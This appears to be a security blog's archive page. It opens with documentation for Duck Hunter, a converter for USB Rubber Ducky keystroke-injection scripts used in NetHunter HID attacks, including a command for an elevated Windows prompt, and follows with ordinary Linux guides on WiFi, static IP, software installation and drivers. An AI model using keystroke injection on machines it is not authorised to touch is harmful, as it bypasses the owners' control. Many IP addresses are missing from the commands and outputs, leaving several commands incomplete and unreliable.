Never Ending Security

It all starts here

Category Archives: Scripts and Config

Duck Hunter


Converts a USB Rubber Ducky script into a Kali NetHunter-friendly format for the HID attack

Original code and concept by @binkybear


Running Duck Hunter -l {us} input.txt

Supports multiple languages: us, fr, de, es, sv, it, uk, ru, dk, no, pt, be

The output file can be run as a regular shell file on NetHunter devices.

Keyboard Commands

Here is a list of commands that will work with your Duck Hunter input file for conversion:

DELAY 1000

Delay in milliseconds; 1000 is equal to 1 second


Apple command key with space will load spotlight


Windows + R key for run


Load an elevated command line in Windows 7


Load an elevated command line in Windows 8

STRING echo "I love ducks"

We pass the text we want to type with the STRING command. STRING presses ENTER at the end of the line by default.

TEXT echo "I love ducky"

TEXT is similar to the STRING command, but instead of pressing ENTER after the text is typed, it leaves the cursor where it is. Useful if you want to type something and then combine it with other commands.

Other useful commands:


Keys can also be combined into: CTRL ALT DEL
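Putting these commands together, a minimal Duck Hunter input file might look like the following. This is a hypothetical example: GUI r is assumed as the "Windows + R" combination described above, and the delays are arbitrary.

```
DELAY 3000
GUI r
DELAY 500
STRING cmd
DELAY 1000
TEXT echo "I love ducks"
ENTER
```

Since STRING presses ENTER by itself, the Run dialog launches cmd immediately; the echo line is then typed with TEXT and confirmed with an explicit ENTER.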

Mouse Commands


Left click and right click.

MOUSE 100 0

Moves the mouse 100 pixels to the right.

MOUSE 0 -50

Moves the mouse 50 pixels up.



Connect to WiFi Network From Command Line In Linux

How many of you have failed to connect to a WiFi network in Linux? Did you bump into issues like the following in forums, discussion pages, and blogs? I am sure everyone did at some point. The following list shows just the results from page 1 of a Google search for “Unable to connect to WiFi network in Linux”.

  1. Cannot connect to wifi at home after upgrade to ubuntu 14.04
  2. Arch Linux not connecting to Wifi anymore
  3. I can’t connect to my wifi
  4. Cannot connect to WiFi
  5. Ubuntu 13.04 can detect wi-fi but can’t connect
  6. Unable to connect to wireless network ath9k
  7. Crazy! I can see wireless network but can’t connect
  8. Unable to connect to Wifi Access point in Debian 7
  9. Unable to connect Wireless

The following guide explains how you can connect to a WiFi network in Linux from the command line. It will take you through the steps for connecting to a WPA/WPA2 WiFi network.


  • WiFi network from command line – Required tools
  • Linux WPA/WPA2/IEEE 802.1X Supplicant
    • iw – Linux Wireless
    • ip – ip program in Linux
    • ping
  • Step 1: Find available WiFi adapters – WiFi network from command line
  • Step 2: Check device status – WiFi network from command line
  • Step 3: Bring up the WiFi interface – WiFi network from command line
  • Step 4: Check the connection status – WiFi network from command line
  • Step 5: Scan to find WiFi Network – WiFi network from command line
  • Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line
  • Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line
  • Step 8: Get an IP using dhclient – WiFi network from command line
  • Step 9: Test connectivity – WiFi network from command line
  • Conclusion

WiFi network from command line – Required tools

The following tools are required to connect to a WiFi network in Linux from the command line:

  1. wpa_supplicant
  2. iw
  3. ip
  4. ping

Before we jump into technical jargon, let’s quickly go over each item, one at a time.

Linux WPA/WPA2/IEEE 802.1X Supplicant

wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop/laptop computers and embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.

iw – Linux Wireless

iw is a new nl80211-based CLI configuration utility for wireless devices. It supports all new drivers that have been added to the kernel recently. The old tool iwconfig, which uses the Wireless Extensions interface, is deprecated, and it is strongly recommended to switch to iw and nl80211.

ip – ip program in Linux

ip is used to show / manipulate routing, devices, policy routing and tunnels. It is used for enabling/disabling devices, and it helps you find general networking information. ip was written by Alexey N. Kuznetsov and added in Linux 2.2. Use man ip to see the full man page.


ping

Good old ping. For every ping, there shall be a pong … ping-pong – ping-pong – ping-pong … that should explain it.

By the way, man ping helps too.

Step 1: Find available WiFi adapters – WiFi network from command line

You need to know your WiFi device name before you can connect to a WiFi network. The following command lists all the connected WiFi adapters in your Linux machine.

root@kali:~# iw dev
phy#1
    Interface wlan0
        ifindex 4
        type managed

Let me explain the output:

This system has one physical WiFi adapter.

  1. Designated name: phy#1
  2. Device name: wlan0
  3. Interface index: 4. Usually assigned per connected port (which can be a USB port).
  4. Type: managed. Type specifies the operational mode of the wireless device; managed means the device is a WiFi station or client that connects to an access point.
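If you need the device name in a script, it can be pulled out of iw dev-style output with awk. This is only a sketch run against a sample of the output shown above, not part of the original article:

```shell
# Sample text mirroring the `iw dev` output shown above.
iw_output='Interface wlan0
    ifindex 4
    type managed'

# Print the second field of the line whose first field is "Interface".
iface=$(printf '%s\n' "$iw_output" | awk '$1 == "Interface" {print $2}')
echo "$iface"
```

On a live system you would pipe the real iw dev output into the same awk filter.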


Step 2: Check device status – WiFi network from command line

You can check whether the wireless device is up or not using the following command:

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

As you can see, the interface wlan0 is currently in state DOWN.

Look for the word “UP” inside the angle brackets in the first line of the output.
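That check can be scripted by splitting the comma-separated flag list between the brackets; a sketch against sample flag lists (not from the article):

```shell
# Return success when the flag list contains UP as a whole word.
# grep -qx matches the whole line, so LOWER_UP does not count as UP.
is_up() { printf '%s' "$1" | tr -d '<>' | tr ',' '\n' | grep -qx UP; }

is_up '<BROADCAST,MULTICAST,UP,LOWER_UP>' && echo "first list: UP"
is_up '<BROADCAST,MULTICAST>'             || echo "second list: DOWN"
```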


In the above example, wlan0 is not UP. Execute the following command to bring it up.

Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFi interface:

root@kali:~# ip link set wlan0 up

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora, etc., run the command with the ‘sudo’ prefix.


If you run the show link command again, you can tell that wlan0 is now UP.

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

Step 4: Check the connection status – WiFi network from command line

You can check the WiFi network connection status from the command line using the following command:

root@kali:~# iw wlan0 link
Not connected.


The above output shows that you are not connected to any network.

Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected

root@kali:~# iw wlan0 scan
BSS 9c:97:26:de:12:37 (on wlan0)
    TSF: 5311608514951 usec (61d, 11:26:48)
    freq: 2462
    beacon interval: 100
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm 
    last seen: 104 ms ago
    Information elements from Probe Response frame:
    SSID: blackMOREOps
    Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
    DS Parameter set: channel 11
    ERP: Barker_Preamble_Mode
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC (0x000c)
    Extended supported rates: 6.0 9.0 12.0 48.0 
---- truncated ----

The two important pieces of information from the above are the SSID and the security protocol (WPA/WPA2 vs WEP). The SSID in the above example is blackMOREOps. The security protocol is RSN, also commonly referred to as WPA2. The security protocol is important because it determines what tool you use to connect to the network.
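Both pieces can be pulled out of the scan output with standard text tools. This is a sketch run against a trimmed copy of the sample output above, not part of the original article:

```shell
# Trimmed sample of `iw wlan0 scan` output.
scan='BSS 9c:97:26:de:12:37 (on wlan0)
    SSID: blackMOREOps
    RSN:     * Version: 1
         * Group cipher: CCMP'

# The SSID is the second field of the "SSID:" line.
ssid=$(printf '%s\n' "$scan" | awk '$1 == "SSID:" {print $2}')

# An RSN information element indicates WPA2.
if printf '%s\n' "$scan" | grep -q 'RSN:'; then sec=WPA2; else sec=other; fi

echo "$ssid is protected with $sec"
```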


Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line

Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.

root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
(you will then be prompted to type the network passphrase on stdin)

wpa_passphrase takes the SSID as an argument, which means you need to type in the passphrase for the WiFi network blackMOREOps after you run the command.


Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix

wpa_passphrase will create the necessary configuration entries based on your input. Each new network will be added as a new configuration block (it won’t replace existing configurations) in the configuration file /etc/wpa_supplicant.conf.

root@kali:~# cat /etc/wpa_supplicant.conf 
# reading passphrase from stdin
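The network block itself was cut off above. For reference, a generated entry typically looks like the following sketch; the psk line stands in for the real 64-character hex hash that wpa_passphrase derives from the passphrase, and is not a value from the article:

```
network={
    ssid="blackMOREOps"
    #psk="abcd1234"
    psk=<64-character hexadecimal hash>
}
```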

Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line

Now that we have the configuration file, we can use it to connect to the WiFi network. We will be using wpa_supplicant to connect. Use the following command:

root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
ioctl[SIOCSIWENCODEEXT]: Invalid argument 
ioctl[SIOCSIWENCODEEXT]: Invalid argument 


  • -B means run wpa_supplicant in the background.
  • -D specifies the wireless driver; wext is the generic driver.
  • -i specifies the wireless interface (wlan0 in this example).
  • -c specifies the path of the configuration file.


Use the iw command to verify that you are indeed connected to the SSID.

root@kali:~# iw wlan0 link
Connected to 9c:97:00:aa:11:33 (on wlan0)
    SSID: blackMOREOps
    freq: 2412
    RX: 26951 bytes (265 packets)
    TX: 1400 bytes (14 packets)
    signal: -51 dBm
    tx bitrate: 6.5 MBit/s MCS 0

    bss flags:    short-slot-time
    dtim period:    0
    beacon int:    100

Step 8: Get an IP using dhclient – WiFi network from command line

Up to step 7, we’ve spent our time connecting to the WiFi network. Now use dhclient to get an IP address via DHCP:

root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.

You can use the ip or ifconfig command to verify the IP address assigned by DHCP:

root@kali:~# ip addr show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
    inet brd scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::260:64ff:fe37:4a30/64 scope link 
       valid_lft forever preferred_lft forever


root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:60:64:37:4a:30 
 inet addr: Bcast: Mask:
 inet6 addr: fe80::260:64ff:fe37:4a30/64 Scope:Link
 RX packets:23868 errors:0 dropped:0 overruns:0 frame:0
 TX packets:23502 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:22999066 (21.9 MiB) TX bytes:5776947 (5.5 MiB)


Add a default routing rule. The last configuration step is to make sure that you have the proper routing rules:

root@kali:~# ip route show 
default via dev wlan0 dev wlan0  proto kernel  scope link  src 


Step 9: Test connectivity – WiFi network from command line

Ping Google’s IP to confirm network connection (or you can just browse?)

root@kali:~# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_req=3 ttl=42 time=265 ms
64 bytes from icmp_req=4 ttl=42 time=176 ms
64 bytes from icmp_req=5 ttl=42 time=174 ms
64 bytes from icmp_req=6 ttl=42 time=174 ms
--- ping statistics ---
6 packets transmitted, 4 received, 33% packet loss, time 5020ms
rtt min/avg/max/mdev = 174.353/197.683/265.456/39.134 ms


This is a very detailed and long guide, so here is a short summary of all the things you need to do, in just a few lines:

root@kali:~# iw dev
root@kali:~# ip link set wlan0 up
root@kali:~# iw wlan0 scan
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
root@kali:~# iw wlan0 link
root@kali:~# dhclient wlan0
root@kali:~# ping
(Where wlan0 is the WiFi adapter and blackMOREOps is the SSID)
(Add routing manually if DHCP does not set it)
root@kali:~# ip route add default via dev wlan0

At the end of it, you should be able to connect to the WiFi network. Depending on the Linux distro you are using and how things go, your commands might be slightly different. Edit the commands as required to meet your needs.

Setup DHCP Or Static IP Address From Command Line In Linux

Did you ever have trouble with Network Manager and feel that you needed to set up DHCP or a static IP address from the command line in Linux? I once accidentally removed Gnome (my bad, wasn’t paying attention and did an apt-get autoremove -y … how bad is that…). So I was stuck: I couldn’t connect to the Internet to reinstall my Gnome Network Manager, because I was in text mode and network-manager was broken. I learned a good lesson: you need the Internet for almost anything these days, unless you’ve memorized all those manual commands.

This guide shows you how to set up DHCP or a static IP address from the command line in Linux. It saved me when I was in trouble; hopefully you will find it useful as well.

Note that my network interface is eth0 for this whole guide. Change eth0 to match your network interface.

Static assignment of IP addresses is typically used to eliminate the network traffic associated with DHCP/DNS and to lock an element in the address space to provide a consistent IP target.

Step 1 : STOP and START Networking service

Some people would argue that restart would work, but I prefer STOP-START for a complete rehash. Besides, if it’s not working already, why bother restarting?

# /etc/init.d/networking stop
 [ ok ] Deconfiguring network interfaces...done.
 # /etc/init.d/networking start
 [ ok ] Configuring network interfaces...done.

Step 2 : STOP and START Network-Manager

If you have some other network manager (e.g. wicd), then stop and start that one instead.

# /etc/init.d/network-manager stop
 [ ok ] Stopping network connection manager: NetworkManager.
 # /etc/init.d/network-manager start
 [ ok ] Starting network connection manager: NetworkManager.

Just for kicks, the following is what restart would do:

 # /etc/init.d/network-manager restart
 [ ok ] Stopping network connection manager: NetworkManager.
 [ ok ] Starting network connection manager: NetworkManager.

Step 3 : Bring up network Interface

Now that we’ve restarted both the networking and network-manager services, we can bring our interface eth0 up. For some, it will already be up but still unusable at this point; we are going to fix that in the next few steps.

# ifconfig eth0 up 
# ifup eth0

The next command shows the status of the interface. As you can see, it doesn’t have any IP address assigned to it yet.

 # ifconfig eth0
 eth0      Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


Step 4 : Setting up IP address – DHCP or Static?

Now we have two options: we can set up DHCP or a static IP address from the command line. If you decide to use a DHCP address, ensure your router is capable of serving DHCP. If you think DHCP was the problem all along, go for static.

Again, if you’re using a static IP address, you might want to investigate what address range is supported on the network you are connecting to (different networks use different private ranges). For some readers this might be a trial-and-error method, but it always works.

Step 4.1 – Setup DHCP from command Line in Linux

Assuming that you’ve already completed steps 1, 2 and 3, you can just use these simple commands.

The first command updates the /etc/network/interfaces file so that the eth0 interface uses DHCP:

# echo "iface eth0 inet dhcp" >> /etc/network/interfaces

The next commands bring up the interface:

# ifconfig eth0 up 
# ifup eth0

With DHCP, you get an IP address, subnet mask, broadcast address, gateway IP and DNS addresses automatically. Go to the connectivity test step below to test your Internet connection.
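As a sketch of what the echo command above produces, the stanza can first be written to a scratch file instead of the real /etc/network/interfaces; this is an illustration, not a step from the article:

```shell
# Write the DHCP stanza to a temporary file rather than /etc/network/interfaces.
cfg=$(mktemp)
echo "iface eth0 inet dhcp" >> "$cfg"
cat "$cfg"
```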

Step 4.2 – Setup static IP, subnet mask, broadcast address in Linux

Use the following commands to set the IP, subnet mask and broadcast address in Linux. You will be able to find suitable values from another device connected to the network, or directly from the router or gateway’s status page (different networks use different private ranges).

 # ifconfig eth0
 # ifconfig eth0 netmask
 # ifconfig eth0 broadcast

The next command shows the IP address and details that we’ve set manually:

# ifconfig eth0
 eth0     Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 inet addr:  Bcast:  Mask:
 RX packets:19325 errors:0 dropped:0 overruns:0 frame:0
 TX packets:19641 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Because we are doing everything manually, we also need to set up the gateway address for the interface. Use the following command to add the default gateway route to eth0:

# route add default gw eth0

We can confirm it using the following command:

# route -n
 Kernel IP routing table
 Destination     Gateway         Genmask         Flags Metric Ref    Use Iface         UG    0      0        0 eth0   U     0      0        0 eth0

Step 4.3 – Alternative way of setting Static IP in a DHCP network

If you’re connected to a network with DHCP enabled but want to assign a static IP to your interface, you can use the following command to assign a static IP, netmask and gateway:

# echo -e "iface eth0 inet static\n address\n netmask\n gateway" >> /etc/network/interfaces

At this point if your network interface is not up already, you can bring it up.

# ifconfig eth0 up 
# ifup eth0
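A sketch of the resulting stanza, written to a scratch file so nothing on the system changes. The addresses here are made-up examples for illustration, not values from the article:

```shell
# Build the static stanza in a temporary file; 192.168.1.50/24 with
# gateway 192.168.1.1 are hypothetical example values.
cfg=$(mktemp)
cat >> "$cfg" <<'EOF'
iface eth0 inet static
    address 192.168.1.50
    netmask 255.255.255.0
    gateway 192.168.1.1
EOF
cat "$cfg"
```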

Step 4.4 –  Fix missing default Gateway

Looks good to me so far. We’re almost there.

Try to ping a well-known host such as Google (because if Google is down, the Internet is broken!):

# ping
 PING ( 56(84) bytes of data.
 64 bytes from ( icmp_req=1 ttl=49 time=520 ms
 64 bytes from ( icmp_req=2 ttl=49 time=318 ms
 64 bytes from ( icmp_req=3 ttl=49 time=358 ms
 64 bytes from ( icmp_req=4 ttl=49 time=315 ms
 --- ping statistics ---
 4 packets transmitted, 4 received, 0% packet loss, time 3002ms
 rtt min/avg/max/mdev = 315.863/378.359/520.263/83.643 ms

It worked!

Step 5 : Setting up nameserver / DNS

For most users, step 4.4 would be the last step. But in case you get a DNS error and want to assign DNS servers manually, use the following command:

# echo -e "nameserver 8.8.8.8\nnameserver 8.8.4.4" >> /etc/resolv.conf

This will add Google Public DNS servers to your resolv.conf file. Now you should be able to ping or browse to any website.
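A sketch against a scratch file rather than the real /etc/resolv.conf (8.8.8.8 and 8.8.4.4 are Google’s public DNS servers, as the text above says):

```shell
# Append the two Google Public DNS entries to a temporary resolv.conf.
resolv=$(mktemp)
printf 'nameserver 8.8.8.8\nnameserver 8.8.4.4\n' >> "$resolv"
cat "$resolv"
```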


Losing your Internet connection these days is just painful, because we are so dependent on the Internet to find usable information. It gets frustrating when you suddenly lose your GUI and/or your Network Manager, and all you’ve got is either an Ethernet port or a wireless card to connect to the Internet. But then again, you need to memorize all these steps.

I’ve tried to make this guide as generic as I can, but if you have a suggestion, or if I’ve made a mistake, feel free to comment. Thanks for reading. Please share & RT.

Highly Useful Linux Commands & Configurations

Oh, you’re gonna love this article! Even though there are many websites hawking similar content, with varying degree of clarity and quality, I want to offer a short, easy-to-use guide to some of the most common yet highly useful commands that could help make your Linux experience more joyful.

Now that you have read some of my installation guides, you have probably setup your system and configured the basic settings. However, I’m positive that some of you must have encountered certain difficulties – a missing package, a missing driver. The initial effort required of a Linux novice can appear daunting, especially after many years of Windows discipline.

Therefore, this article was born, in order to offer simple solutions to some of the more widespread problems that one might face during and immediately after a Linux installation. It is intended for the beginner and intermediate users, who still feel slightly uncomfortable with meddling in command line, scripts or configuration files.

This article will refer to Ubuntu Linux distribution as the demonstration platform. However, all of these commands will work well with many other Linux distributions, with only small changes in syntax, at most. I have personally tested and used all of the commands and configurations in both Debian-based and RedHat-based distributions with success.

What am I going to write about?

Here are the topics. If you want to skip through some of the paragraphs, you can use the table of contents further below, but I recommend you read everything.

  • Basic tips – avoiding classic mistakes.
  • Commands – an introduction to the command line.
  • Installation of software – including extraction of archives and compilation of sources.
  • Installation of drivers – including compilation, loading, configuration, and addition of drivers to the bootup chain, writing of scripts and addition to the bootup chain.
  • Mounting of drives – including NTFS and FAT32 filesystems and read/write permissions.
  • Installation of graphic card drivers – including troubleshooting of stubborn common problems.
  • Network sharing – how to access shared folders in Windows and Linux from one another.
  • Printer sharing – how to share printers in Windows and Linux from one another.
  • Some other useful commands.

Table of contents

  1. Basic tips
  2. Commands
    1. Asking for help
  3. Installation of software
    1. What should you choose?
    2. Discipline
    3. Unpacking an archive
    4. Zipped archives
    5. Installation
    6. Compilation (from sources)
    7. Summary of installation procedures
  4. Installation of drivers
    1. Installation
    2. Loading drivers
    3. Configuration of drivers
    4. Scripts
  5. Mounting a drive
    1. Other options
  6. Installation of graphic card drivers
  7. Network sharing
    1. Windows > Linux
    2. Linux > Windows
  8. Printer sharing
  9. Other useful commands
    1. Switching between runlevels
    2. Backing up the X Windows configuration file (useful before graphic drivers update)
    3. Display system environment information
    4. Listing information about files and folders
    5. Kill a process

Basic tips

There are some things you need to know before heading into the deep waters of the Command Line:

  • Linux commands are cAse-sensitive (dedoimedo and Dedoimedo are two different files).
  • It is best to create folders and files in Linux WITHOUT spaces. For example: Red Gemini.doc is a valid Windows filename, but you might have problems accessing it from the command line in Linux; you should rename the file to RedGemini.doc. Users of the DOS command line are also familiar with this problem – commands will fail on folders and files with more than a single word, unless explicitly declared with double quotation marks (“like this”).
  • Pressing TAB when typing a command will auto-complete the command. For example: if you have a single file in a certain folder that begins with the letter p, typing p then TAB will automatically complete the name regardless of its length; if you have more than one file, the command will complete the maximum available part of the string that matches all relevant filenames (s + TAB for smirk and smile will auto-complete to smi).
  • Before copying, moving, deleting, or tweaking any file, especially scripts and configuration files, it is best to back them up first.
  • Do NOT stop the commands while they are running (by pressing Ctrl + C). Even though you may not see the HDD light blinking and the execution takes a very long time, do not assume the system is frozen. Unlike Windows, Linux almost never gets stuck. Let the command complete, be it 5 seconds or 5 hours. Just for reference, compilation of certain programs can take a few days to complete.


To be able to use the command line, you need to be familiar with some rudimentary Linux commands. Former users of DOS will find the transition very simple. Below you can find links to some of the basic Linux commands:

Alphabetic Directory of Linux Commands

An A-Z Index of the Linux BASH command line

Some Useful Linux Commands

Asking for help

First, anything and everything you could ever probably think of has already been answered at least once in a Linux forum; use the forums to find solutions to … everything. Copy & paste your error code / message into a search engine of your choosing (e.g. Google) and you will find links to answers in 99.9996532% of cases.

Locally, help is one of the most useful features available to the command line user. If, for some reason, you cannot figure out the syntax required to use a command, you can ask for help. There are two ways of doing it:

man some_command

The above usage will display the full manual page for the command in question, in a Vi-like pager. You can learn more about Vi from An Extremely Quick and Simple Introduction to the Vi Text Editor.

some_command --help

The above usage will display a summary of available options for the command in question, inside the command line terminal. You will most likely prefer to use this second way.

Installation of software

Although most Linux distributions offer a wealth of useful programs, you will probably be compelled to try new products. Some programs will be available for download via package managers, like Synaptic. Others will only be found on the developer’s site, most likely packaged inside an archive.

You probably ask yourself: What now? The answer is very simple. There are three versions to your downloads, from the easiest to hardest:

  1. Compiled packages, usually with a .rpm or .deb extension. These packages are similar to Windows .exe installers and will unpack and install automatically. The upside of packages is the relative ease of their deployment; the downside is that the user has no control over the installation script.
  2. Compiled archives, called tarballs, with .tar extension. These archives will contain all of the necessary files required to make a program run, but the user will have to install them manually, from the command line, after unpacking the archive. These archives will also most likely be compressed and bear a double extension like tar.gz or tar.bz2. This option offers more control during the installation.
  3. Sources, usually archived. The user will have to unpack the archives and then compile the sources before being able to actually install the program. In addition to better control of the installation, the user will also benefit from software optimized to his hardware configuration.

What should you choose?

The logical choice for the novice user should be 1 > 2 > 3. Intermediate users will probably try 2 > 3. Geeks will most likely only ever compile from sources.


Discipline

This may sound harsh or strict, but certain unspoken rules are followed, which simplify the use of software downloads.

  • The program itself will almost always be accompanied by a how-to, usually in the form of a text file that explains what a user should do prior to, during, and after the installation. The how-tos are most often found on the site you download the software from, either as a standalone file, as explanatory text on the download page, or bundled with the download.
  • You should read this how-to FIRST before downloading / manipulating the software.
  • A secondary how-to will most often be packed with the program, explaining the installation process itself.
  • You should read this how-to FIRST before installing the software.

Unpacking an archive

The exact syntax will differ from one package to another. But the general idea is the same for all. The only difference will be in the arguments used for unpacking. Here are a few common examples:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

You can read in detail about the handling of tarballs on the Wikipedia site.
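A self-contained round trip you can try safely; the directory, archive and file names here are made up for illustration:

```shell
# Build a gzipped tarball in a scratch directory, then unpack it again.
workdir=$(mktemp -d)
cd "$workdir"
mkdir some_software
echo "sample file" > some_software/README
tar zcf some_software.tar.gz some_software
rm -r some_software

# Same form as the first example above.
tar zxf some_software.tar.gz
cat some_software/README
```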

Zipped archives

Some archives will be zipped rather than tarred. This might put you off. But the problem is easily solvable. If you recall, we have the ability to “ask” for help for each unknown command. In our case, we need to know how to unzip an archive.

unzip --help

Here’s a screenshot I took, depicting the very dilemma we are facing – and its solution:


A possible usage will then be:

unzip -d /tmp

Reading from the help screen above, we want to unpack our archive into a folder. The -d argument tells us that the contents of the archive will be extracted into a destination directory (folder), in our case a temporary folder called /tmp.


Installation

After unpacking the archive, you have to install the software. Usually, the installation is invoked by using a script. The exact name of the script will vary from one program to another, as will its extension, depending on the language used to write it.

For example, the following command will invoke an installation script (written in Perl). The dot and trailing slash indicate that the script will be executed from within the current directory.


Compilation (from sources)

Sometimes, the programs will not be compiled and ready to install. The archives will contain lots of files with curious extensions like .c, .h and .o. If you are not a programmer, you should not bother understanding what they are and what they do. Likewise, you need not understand how the compilation of sources is made. You just need to remember three simple commands:

The first command generates the files required to build the software and sets up system-wide parameters:

./configure

The second command builds the libraries and applications:

make

The third command installs the libraries and applications:

make install

For homework, you could use some reading:

Compiling and installing software from source in Linux

There is no guarantee that the compilation will succeed. Some sources are broken! In that case, you should make note of the errors and post them in relevant forums, where you are most likely to find an answer rather quickly.

Summary of installation procedures

To make things easier to understand, below are two examples showing the list of commands required to successfully install a downloaded application (please note these are ONLY examples!). Most likely, you will need root privileges (su or sudo) to be able to install software. An archive containing a compiled program:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory

An archive containing sources:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory
./configure
make
make install

Installation of drivers

Drivers are programs, like any software. The only difference is – you do not actively use them. They serve the purpose of making your hardware components understand each other. As simple as that. You need them to enhance your usage of the operating system.

Most often, the necessary drivers will be included with the distribution and installed during the setup. Sometimes, you might not be so lucky and will reach a newly installed desktop without sound, network or video drivers.

I will not go into details explaining how specific drivers are installed. You should contact your vendors for that information. I will explain how to install the drivers, how to load them, and then how to add them to startup, so they will load automatically every time your machine starts.


Just like any software, drivers may come compiled or not. Most often, they will not be. Drivers will usually be distributed as sources, in order to achieve maximum compatibility with the hardware on the installation platform. This means you will have to compile them from sources. Piece of cake. We already know how to do that.

If the vendor is benevolent, it is possible that the driver will be accompanied with a self-installation script. In other words, you will need to run only one command, which will in turn extract the archive, compile, install, and load it. But this might not be the case – or might not even work. I have personally witnessed a driver self-installation script go wrong. Therefore, for all practical purposes, you should probably manually install the driver.

After successfully extracting the archive and compiling the sources (./configure, make, make install), you will most likely be faced with three choices:

  • The driver will be fully configured and copied to the default directories, and the system paths updated. You will not need to do anything special to use the driver.
  • The driver will be auto-configured and the system paths updated. This means you will only have to add the driver name to the list of drivers loaded during boot to enable it every time the machine starts.
  • The driver will be ready to use, but it will not be configured, nor will the system paths be updated. You will have to manually load the driver and then update the list of drivers loaded during boot to enable it every time the machine starts.

The second option will make the installation process probably look like this:

tar zxf some_driver.tar.gz
tar -xjf some_driver.tar.bz2

cd some_driver_directory
./configure
make
make install



All that remains is to add this driver to the list of drivers loaded at bootup. In Linux, the drivers are often referred to as modules.

You need to open the configuration file containing the list of modules. You should refer to your specific distribution for the exact name and location of this file. In Ubuntu, the file is called modules.conf and is found in the /etc directory (/etc/modules.conf). We will update this file, but first we will back it up! Please remember that you need root privileges to meddle with the configuration files.

This is what our procedure would look like:

cp /etc/modules.conf /etc/modules.conf.bak
gedit /etc/modules.conf

The above commands will open the file modules.conf inside the gedit text editor. Simply add your driver in an empty line below the existing drivers, save the file, exit the text editor, and reboot for the change to take effect. That’s all!

Here’s an example of a modules.conf file for a Kubuntu Linux, installed as a virtual machine. To add a new driver, we would simply write its name below the existing entries. Of course, you need to know the EXACT name of the driver in question.
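The same backup-then-append edit can also be done non-interactively. The sketch below works on a scratch copy in /tmp, since editing the real /etc/modules.conf needs root; mydriver is a placeholder module name:

```shell
#!/bin/sh
# Scratch copy standing in for /etc/modules.conf.
conf=/tmp/modules.conf
printf 'lp\nrtc\n' > "$conf"   # pretend these are the existing modules

cp "$conf" "$conf.bak"         # back the file up first
echo "mydriver" >> "$conf"     # append the new module on its own line
tail -n 1 "$conf"              # confirm the last line is now mydriver
```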

Linux commands - modules.conf

The third option is a bit more complex.

Loading drivers

You have successfully compiled the driver, but nothing has happened yet. This is because the driver is not yet enabled. Looking inside the directory, you will notice a file with .ko extension. This is your driver and you need to manually load it.

We need to install the driver into the kernel. This can be done using the insmod command.

cd driver_directory
insmod driver.ko

After the driver is loaded, it can be configured. To verify that the driver is indeed present, you can list all the loaded modules:

lsmod

If by some chance you have made a terrible mistake and you wish to remove the driver, you can use the rmmod command:

rmmod driver
Configuration of drivers

Configuring the driver requires a bit of knowledge into its functionality. Most often, instructions will be included in the how-to text files.

Below, the example demonstrates how the network card is configured after the network driver is loaded. The network card is assigned an identifier and an IP address. In this particular case, eth0 was the selected device name, although it could also be eth1, eth2 or any other name. The assigned IP address tells us the machine will be part of a LAN network.

ifconfig eth0

After a reboot, you will realize that you no longer enjoy a network connection. This is because your driver has not been created in a common default directory and the system does not know where to look for it. You will have to repeat the entire procedure again:

cd driver_directory
insmod driver.ko
ifconfig eth0

You now realize that an automated script would be an excellent idea for solving this problem. This is exactly what we’re going to do – write a script and add it to bootup.


Like in DOS and Windows, scripts can be written in any text editor. However, a few changes are needed to distinguish scripts from plain text files. In Windows, simply renaming the .txt extension to .bat converts the file into a script. In Linux, things are a bit different.

